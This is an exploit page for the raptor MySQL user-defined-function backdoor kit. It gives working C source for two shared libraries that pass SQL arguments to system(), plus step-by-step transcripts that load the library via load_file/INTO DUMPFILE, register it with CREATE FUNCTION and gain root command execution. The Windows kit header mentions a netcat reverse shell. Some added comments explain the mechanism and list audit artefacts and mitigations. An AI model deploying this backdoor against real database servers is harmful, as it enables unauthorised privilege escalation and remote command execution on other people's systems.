
MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)

MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)

-- raptor_winudf.sql - A MySQL UDF backdoor kit for Windows
-- Copyright (c) 2007 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
--
-- This is a MySQL backdoor kit for Windows based on the UDFs (User Defined
-- Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port
-- 80/tcp) or to execute single OS commands (exec UDF). Don't forget to edit
-- the MySQL bin path below according to your target's configuration.
--
-- Thanks to KDM for asking me to do research on this interesting subject!
--
-- See also:
-- [url]http://www.0xdeadbeef.info/exploits/raptor_udf.c[/url]
-- [url]http://www.0xdeadbeef.info/exploits/raptor_udf2.c[/url]
--
-- Tested on:
-- MySQL 4.0.18-win32 (running on Windows XP SP2)
-- MySQL 4.1.22-win32 (running on Windows XP SP2)
-- MySQL 5.0.27-win32 (running on Windows XP SP2)


raptor_winudf.gz (68 KB)



raptor_udf.c
/*
* $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $
*
* raptor_udf.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2004 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
*
* This is a helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.
*
* Code ripped from: [url]http://www.ngssoftware.com/papers/HackproofingMySQL.pdf[/url]
*
* "MySQL provides a mechanism by which the default set of functions can be
* expanded by means of custom written dynamic libraries containing User
* Defined Functions, or UDFs". -- Hackproofing MySQL
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf.c
* $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
* mysql> create function do_system returns integer soname 'raptor_udf.so';
* mysql> select * from mysql.func;
* +-----------+-----+---------------+----------+
* | name    | ret | dl        | type    |
* +-----------+-----+---------------+----------+
* | do_system |  2 | raptor_udf.so | function |
* +-----------+-----+---------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/

#include <stdio.h>
#include <stdlib.h>

/*
 * Local copies of the MySQL UDF interface types. The server fills in a
 * UDF_ARGS/UDF_INIT pair and passes it to do_system() below, so these
 * definitions have to match the declarations of the mysqld build that loads
 * the library (presumably copied from the server's public UDF header — the
 * field order and widths are what the calling convention relies on).
 */
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
  unsigned int    arg_count;  // number of arguments
  enum Item_result  *arg_type;  // pointer to item_result, one entry per argument
  char       **args;    // pointer to arguments (one buffer per argument)
  unsigned long    *lengths;  // length of string args; NOTE(review): per the UDF API this,
                              // not NUL termination, is the authoritative byte count — confirm
  char      *maybe_null;  // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
  char      maybe_null;  // 1 if func can return NULL
  unsigned int    decimals;  // for real functions
  unsigned long     max_length;  // for string functions
  char      *ptr;    // free ptr for func data (unused by do_system)
  char      const_item;  // 0 if result is constant
} UDF_INIT;

/*
 * UDF entry point. Hands the single string argument straight to the C
 * library's system(), i.e. to the platform shell, from inside the mysqld
 * process: the command therefore runs with whatever privileges the server was
 * started with (the header above describes the server-running-as-root case).
 *
 * initid, is_null and error belong to the UDF calling convention and are not
 * used. The function always returns 0 — the SQL caller sees integer 0 whether
 * the argument count was wrong, the command failed, or it succeeded — and
 * system()'s exit status is discarded, so nothing about the outcome is
 * reported back through SQL.
 *
 * Defensive notes: in the usage transcript the library is written into the
 * server's library path with load_file()/INTO DUMPFILE (FILE privilege) and
 * registered with CREATE FUNCTION; the registration is then visible as a row
 * in mysql.func naming the shared object. An unexpected row there, or a
 * shared object appearing in the directory the server loads UDFs from, is the
 * durable artefact of this technique. Running mysqld without root privileges
 * and limiting FILE/CREATE FUNCTION are the mitigations the header's own
 * "very bad idea" remark points at.
 */
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
  if (args->arg_count != 1)  /* only the one-argument form is accepted */
    return(0);

  system(args->args[0]);  /* blocking: mysqld waits for the shell to finish */

  return(0);
}


raptor_udf2.c
/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <[email]raptor@0xdeadbeef.info[/email]>
*
* This is a helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: [url]http://www.0xdeadbeef.info/exploits/raptor_udf.c[/url]
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <[email]stefano.dipaola@wisec.it[/email]>. For further
* details, please refer to:
*
* [url]http://dev.mysql.com/doc/refman/5.0/en/udf-security.html[/url]
* [url]http://www.wisec.it/vulns.php?page=4[/url]
* [url]http://www.wisec.it/vulns.php?page=5[/url]
* [url]http://www.wisec.it/vulns.php?page=6[/url]
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name    | ret | dl         | type    |
* +-----------+-----+----------------+----------+
* | do_system |  2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/

#include <stdio.h>
#include <stdlib.h>

/*
 * Local copies of the MySQL UDF interface types. The server fills in a
 * UDF_ARGS/UDF_INIT pair and passes it to do_system()/do_system_init() below,
 * so these definitions have to match the declarations of the mysqld build
 * that loads the library (presumably copied from the server's public UDF
 * header — the field order and widths are what the calling convention relies
 * on).
 */
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
  unsigned int    arg_count;  // number of arguments
  enum Item_result  *arg_type;  // pointer to item_result, one entry per argument
  char       **args;    // pointer to arguments (one buffer per argument)
  unsigned long    *lengths;  // length of string args; NOTE(review): per the UDF API this,
                              // not NUL termination, is the authoritative byte count — confirm
  char      *maybe_null;  // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
  char      maybe_null;  // 1 if func can return NULL
  unsigned int    decimals;  // for real functions
  unsigned long     max_length;  // for string functions
  char      *ptr;    // free ptr for func data (unused by do_system)
  char      const_item;  // 0 if result is constant
} UDF_INIT;

/*
 * UDF entry point, unchanged from raptor_udf.c. Hands the single string
 * argument straight to the C library's system(), i.e. to the platform shell,
 * from inside the mysqld process: the command runs with whatever privileges
 * the server was started with (the header above describes the
 * server-running-as-root case).
 *
 * initid, is_null and error belong to the UDF calling convention and are not
 * used. The function always returns 0 — the SQL caller sees integer 0 whether
 * the argument count was wrong, the command failed, or it succeeded — and
 * system()'s exit status is discarded, so nothing about the outcome is
 * reported back through SQL.
 *
 * Defensive notes: the only difference from the earlier kit is the extra
 * do_system_init symbol below, added because the 4.1.10a/4.0.24 UDF loading
 * check quoted in the header refuses libraries that export nothing besides
 * the main symbol; that check is a sanity check on the library, not an
 * authorisation control. The registration still leaves a row in mysql.func
 * naming the shared object, and the object itself sits in the server's
 * library path — those remain the artefacts to audit. Running mysqld without
 * root privileges and limiting FILE/CREATE FUNCTION are the mitigations the
 * header's own "very bad idea" remark points at.
 */
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
  if (args->arg_count != 1)  /* only the one-argument form is accepted */
    return(0);

  system(args->args[0]);  /* blocking: mysqld waits for the shell to finish */

  return(0);
}

/*
 * Auxiliary xxx_init symbol. It exists only so the library carries "at least
 * one symbol defined in addition to the xxx symbol", the requirement quoted
 * in the header that newer servers enforce when loading a UDF. It performs no
 * argument-count or argument-type validation and never writes to message;
 * returning 0 reports successful initialisation to the server, so every call
 * of do_system() proceeds to the arg_count check in the main function.
 */
char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
  return(0);
}

